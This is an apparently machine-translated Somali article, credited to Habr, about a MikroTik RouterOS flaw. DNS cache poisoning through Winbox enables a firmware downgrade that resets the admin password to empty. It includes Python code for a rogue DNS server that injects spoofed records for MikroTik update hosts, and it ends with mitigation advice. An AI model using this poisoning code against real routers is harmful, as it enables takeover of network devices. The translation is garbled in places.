Awoodda meel fog laga dhimo aaladaha ku saleysan RouterOS (Mikrotik) waxay halis gelineysaa boqollaal kun oo aaladaha shabakadda. Nuglaanta waxay la xiriirtaa sumaynta kaydka DNS ee borotokoolka Winbox waxayna kuu ogolaaneysaa inaad ku shubto duugoobay (oo leh dib u dejintii furaha furaha) ama qalabka wax laga beddelay ee aaladda.
Faahfaahinta nuglaanta
Terminalka RouterOS wuxuu taageeraa amarka xallinta raadinta DNS.
Codsigan waxa gacanta ku haya laba-geesood oo loo yaqaan xaliye. Xallinta waa mid ka mid ah binaries badan oo ku xira borotokoolka Winbox ee RouterOS. Heer sare, "farimaha" loo diro dekedda Winbox waxaa loo diri karaa binaries kala duwan ee RouterOS oo ku salaysan nidaamka nambarada ku salaysan.
Sida caadiga ah, RouterOS waxay leedahay astaanta server-ka DNS waa naafo.
Si kastaba ha noqotee, xitaa marka shaqada server-ka ay naafada tahay, router-ku wuxuu hayaa kaydkiisa DNS.
Markaan codsi samayno anagoo adeegsanayna winbox_dns_request tusaale ahaan.com, router-ku wuxuu kaydin doonaa natiijada.
Maaddaama aan cayimi karno server-ka DNS kaas oo codsigu ku soconayo, gelista ciwaannada khaldan waa wax yar. Tusaale ahaan, waxaad ka habeyn kartaa hirgelinta server-ka DNS inaad had iyo jeer kaga jawaabto diiwaan A ka kooban ciwaanka IP 192.168.88.250.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Hadda haddii aad raadiso tusaale.com adoo isticmaalaya Winbox, waxaad arki kartaa in khasnadda DNS ee router-ka ay sumaysan tahay.
Dabcan, sumaynta example.com maaha mid faa'iido leh maadaama router uusan dhab ahaantii isticmaali doonin. Si kastaba ha ahaatee, router-ku wuxuu u baahan yahay inuu galo update.mikrotik.com, Cloud.mikrotik.com, Cloud2.mikrotik.com iyo download.mikrotik.com. Waxaana mahad iska leh qalad kale, waa suurtagal in hal mar la wada sumeeyo.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Router-ku wuxuu codsanayaa hal ogolaansho, waxaanan siinay shan dib u celin. Router-ku si sax ah uma kaydiyo dhammaan jawaabahaas.
Sida iska cad, weerarkani sidoo kale waa mid faa'iido leh haddii routerku u shaqeeyo sidii server-ka DNS, maadaama ay u ogolaato macaamiisha router in la weeraro.
Weerarkan wuxuu sidoo kale kuu ogolaanayaa inaad ka faa'iidaysato nuglaanta daran: hoos u dhigista ama dib u celi nooca RouterOS. Weeraryahanku waxa uu dib u abuuraa macquulnimada server-ka cusboonaysiinta, oo uu ku jiro beddelka, oo ku qasba RouterOS in uu u garto nooca duugoobay (Nuglaanshaha) in uu hadda yahay. Khatarta halkan ku jirtaa waxay ku jirtaa xaqiiqda ah in marka nooca la cusboonaysiiyo, erayga sirta ah ee maamulaha dib loo dejiyo qiimaha caadiga ah - weeraryahanku wuxuu geli karaa nidaamka isagoo wata erey madhan!
Weerarku aad buu u shaqaynayaa, inkastoo ay taasi jirto fuliyaa dhowr vector oo kale, oo ay ku jiraan kuwa la xiriira , laakiin tani waa farsamo aan loo baahnayn oo isticmaalkeeda ujeeddooyin aan sharci ahayn waa sharci-darro.
ilaalinta
Si fudud u deminta Winbox waxay kuu ogolaanaysaa inaad naftaada ka ilaaliso weeraradan. In kasta oo ay ku habboon tahay maamulka iyada oo loo marayo Winbox, way fiicantahay in la isticmaalo borotokoolka SSH.
Source: www.habr.com